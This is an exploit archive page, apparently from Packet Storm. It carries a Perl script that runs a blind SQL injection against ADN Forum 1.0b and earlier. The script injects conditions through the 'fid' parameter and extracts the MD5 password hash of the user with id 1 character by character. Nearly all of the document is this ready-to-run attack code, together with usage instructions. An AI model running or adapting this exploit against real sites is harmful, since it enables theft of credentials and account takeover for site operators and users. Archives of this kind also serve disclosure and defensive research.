exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

adnforum-sql.txt

adnforum-sql.txt
Posted Oct 1, 2008
Authored by StAkeR

ADN Forum versions 1.0b and below blind SQL injection exploit.

tags | exploit, sql injection
SHA-256 | c59ee568fa602a754fcc08646e40e2c8f9e5c706122aee1157cd94d7f2ae6504

adnforum-sql.txt

Change Mirror Download
#!/usr/bin/perl
# --------------------------------------------------
# ADN Forum <= 1.0b Blind SQL Injection Exploit
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Discovered On: 01/10/2008
# Download: http://sourceforge.net/projects/adnforum/
# --------------------------------------------------
# Usage: perl exploit.pl http://localhost
# --------------------------------------------------

use strict;
use warnings;
use LWP::UserAgent;
use URI::Escape;

my ($request,$send,$ord,$hash,$uid) = (undef,undef,undef,undef,1);

my $host = shift @ARGV or die "[?] Usage: perl $0 http://[host]\n";
my @chars = (48..57, 97..102);
my $http = new LWP::UserAgent;

for(0..32)
{
foreach $ord(@chars)
{
$send = "' or ascii(substring((select password from adn_usuarios where id=1),$uid,1))=$ord#";
$send = uri_escape($send);

$request = $http->get($host."/index.php?fid=".$send);

if($request->is_success and $request->content =~ /hace clic en el boton de abajo/i)
{
$hash .= chr($ord);
$uid++;
}
}
}

if(defined $hash)
{
print "[+] MD5: $hash\n";
exit;
}
else
{
print "[?] Exploit Failed!\n";
exit;
}

Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close